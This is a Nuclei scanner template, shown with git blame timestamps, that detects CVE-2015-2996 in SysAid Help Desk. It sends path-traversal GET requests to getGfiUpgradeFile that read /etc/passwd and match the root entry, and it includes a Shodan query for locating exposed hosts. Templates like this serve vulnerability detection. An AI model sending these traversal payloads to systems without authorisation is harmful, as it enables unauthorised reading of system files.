nuclei-templates/http/cves/2015/CVE-2015-2996.yaml

48 lines
1.8 KiB
YAML
Raw Normal View History

2022-09-27 21:42:24 +00:00
id: CVE-2015-2996
2023-02-07 04:30:16 +00:00
2022-09-27 21:42:24 +00:00
info:
name: SysAid Help Desk <15.2 - Local File Inclusion
2022-09-27 21:42:24 +00:00
author: 0x_Akoko
severity: high
2023-02-07 04:29:53 +00:00
description: |
SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
2023-09-06 13:22:34 +00:00
remediation: |
Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.
2022-09-27 21:42:24 +00:00
reference:
- https://seclists.org/fulldisclosure/2015/Jun/8
- https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
- http://seclists.org/fulldisclosure/2015/Jun/8
- https://nvd.nist.gov/vuln/detail/CVE-2015-2996
2022-09-27 21:42:24 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C
cvss-score: 8.5
2022-09-27 21:42:24 +00:00
cve-id: CVE-2015-2996
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.77754
epss-percentile: 0.97884
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*
2023-02-07 04:29:53 +00:00
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: sysaid
product: sysaid
2023-09-06 13:22:34 +00:00
shodan-query: http.favicon.hash:1540720428
tags: cve,cve2015,sysaid,lfi,seclists
2022-09-27 21:42:24 +00:00
http:
2022-09-27 21:42:24 +00:00
- method: GET
path:
- "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
2023-02-07 04:29:53 +00:00
- "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
2022-09-27 21:42:24 +00:00
2023-02-07 04:29:53 +00:00
stop-at-first-match: true
2023-07-11 19:49:27 +00:00
2022-09-27 21:42:24 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a00473045022100daca7ba49520acaa3916baf2088091125280782c2deb61680865e7342387e6470220356cd002c161ca1d7ae0a9890bbcc33bb7678c691893bc518f11a78558015f6c:922c64590222798bb761d5b6d8e72950